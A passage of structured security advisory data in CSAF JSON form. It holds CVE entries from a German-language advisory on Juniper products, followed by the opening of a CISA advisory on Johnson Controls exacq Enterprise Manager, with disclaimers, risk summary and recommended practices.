"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-4129"
},
{
"cve": "CVE-2022-41222",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-41222"
},
{
"cve": "CVE-2022-41218",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-41218"
},
{
"cve": "CVE-2022-39189",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-39189"
},
{
"cve": "CVE-2022-39188",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-39188"
},
{
"cve": "CVE-2022-38023",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-38023"
},
{
"cve": "CVE-2022-37434",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-37434"
},
{
"cve": "CVE-2022-3707",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3707"
},
{
"cve": "CVE-2022-3628",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3628"
},
{
"cve": "CVE-2022-3625",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3625"
},
{
"cve": "CVE-2022-3623",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3623"
},
{
"cve": "CVE-2022-3619",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3619"
},
{
"cve": "CVE-2022-3567",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3567"
},
{
"cve": "CVE-2022-3566",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3566"
},
{
"cve": "CVE-2022-3564",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3564"
},
{
"cve": "CVE-2022-3524",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3524"
},
{
"cve": "CVE-2022-3239",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3239"
},
{
"cve": "CVE-2022-30594",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-30594"
},
{
"cve": "CVE-2022-3028",
"notes": [
{
"category": "description",
"text": "Es existieren mehrere Schwachstellen in verschiedenen Juniper-Produkten. Die Fehler bestehen aufgrund von unsachgem\u00e4\u00dfen Initialisierungen, nicht willk\u00fcrlichen Schreib- und Use-after-free-Fehlern, bei der \u00dcberpr\u00fcfung von \u00fcberm\u00e4\u00dfig langen DH-Schl\u00fcsseln, unsachgem\u00e4\u00dfen Pufferbeschr\u00e4nkungen, einer Speicher\u00fcberschreitung, einer unsachgem\u00e4\u00dfen Behandlung/Pr\u00fcfung von Ausnahmebedingungen, einem Out-of-bounds-Schreiben und einer unsachgem\u00e4\u00dfen Validierung der syntaktischen Korrektheit der Eingabe. Ein Angreifer kann diese Schwachstellen ausnutzen, um beliebigen Code auszuf\u00fchren, Sicherheitsma\u00dfnahmen zu umgehen, vertrauliche Informationen offenzulegen, einen Denial-of-Service-Zustand zu verursachen und seine Privilegien zu erweitern. Die erfolgreiche Ausnutzung einiger dieser Schwachstellen erfordert eine Benutzerinteraktion oder erh\u00f6hte Privilegien."
}
],
"product_status": {
"known_affected": [
"T030475",
"T031995",
"T030476",
"T031994",
"T031997",
"T031996",
"918766",
"T030471",
"T021598",
"T018886",
"T021597",
"T019811",
"T023853",
"T021593"
]
},
"release_date": "2024-01-10T23:00:00.000+00:00",
"title": "CVE-2022-3028"
}
]
}
icsa-21-357-02
Vulnerability from csaf_cisa
Published
2021-12-23 00:00
Modified
2021-12-23 00:00
Summary
Johnson Controls exacq Enterprise Manager
Notes
CISA Disclaimer
This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov
Legal Notice
All information products included in https://us-cert.cisa.gov/ics are provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.
Risk evaluation
Successful exploitation of this vulnerability could allow an attacker to enter malicious input resulting in remote code execution.
Critical infrastructure sectors
Critical Manufacturing
Countries/areas deployed
Worldwide
Company headquarters location
Ireland
Recommended Practices
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:
Recommended Practices
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
Recommended Practices
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.
Exploitability
No known public exploits specifically target this vulnerability.
{
"document": {
"acknowledgments": [
{
"organization": "Johnson Controls, Inc",
"summary": "reporting this vulnerability to CISA"
}
],
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Disclosure is not limited",
"tlp": {
"label": "WHITE",
"url": "https://us-cert.cisa.gov/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "This CSAF advisory was extracted from unstructured data and may contain inaccuracies. If you notice any errors, please reach out to the designated contact at CISA CSAF: central@cisa.dhs.gov",
"title": "CISA Disclaimer"
},
{
"category": "legal_disclaimer",
"text": "All information products included in https://us-cert.cisa.gov/ics are provided \"as is\" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service, referenced in this product or otherwise. Further dissemination of this product is governed by the Traffic Light Protocol (TLP) marking in the header. For more information about TLP, see https://us-cert.cisa.gov/tlp/.",
"title": "Legal Notice"
},
{
"category": "summary",
"text": "Successful exploitation of this vulnerability could allow an attacker to enter malicious input resulting in remote code execution.",
"title": "Risk evaluation"
},
{
"category": "other",
"text": "Critical Manufacturing",
"title": "Critical infrastructure sectors"
},
{
"category": "other",
"text": "Worldwide",
"title": "Countries/areas deployed"
},
{
"category": "other",
"text": "Ireland",
"title": "Company headquarters location"
},
{
"category": "general",
"text": "CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability. Specifically, users should:",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.\nCISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.",
"title": "Recommended Practices"
},
{
"category": "general",
"text": "Additional mitigation guidance and recommended practices are publicly available on the ICS webpage on cisa.gov in the Technical Information Paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to CISA for tracking and correlation against other incidents.",
"title": "Recommended Practices"
},
{
"category": "other",
"text": "No known public exploits specifically target this vulnerability.",
"title": "Exploitability"
}
],
"publisher": {
"category": "coordinator",
"contact_details": "Email: CISAservicedesk@cisa.dhs.gov;\n Toll Free: 1-888-282-0870",
"name": "CISA",
"namespace": "https://www.cisa.gov/"
},
"references": [
{
"category": "self",
"summary": "ICS Advisory ICSA-21-357-02 JSON",
"url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/OT/white/2021/icsa-21-357-02.json"
},
{
"category": "self",
"summary": "ICS Advisory ICSA-21-357-02 Web Version",
"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-21-357-02"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-10-301-01"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf"
},
{
"category": "external",
"summary": "Recommended Practices",
"url": "https://www.cisa.gov/uscert/ics/tips/ICS-TIP-12-146-01B"
}
],
"title": "Johnson Controls exacq Enterprise Manager",
"tracking": {
"current_release_date": "2021-12-23T00:00:00.000000Z",
"generator": {
"engine": {
"name": "CISA CSAF Generator",
"version": "1.0.0"
}
},
"id": "ICSA-21-357-02",
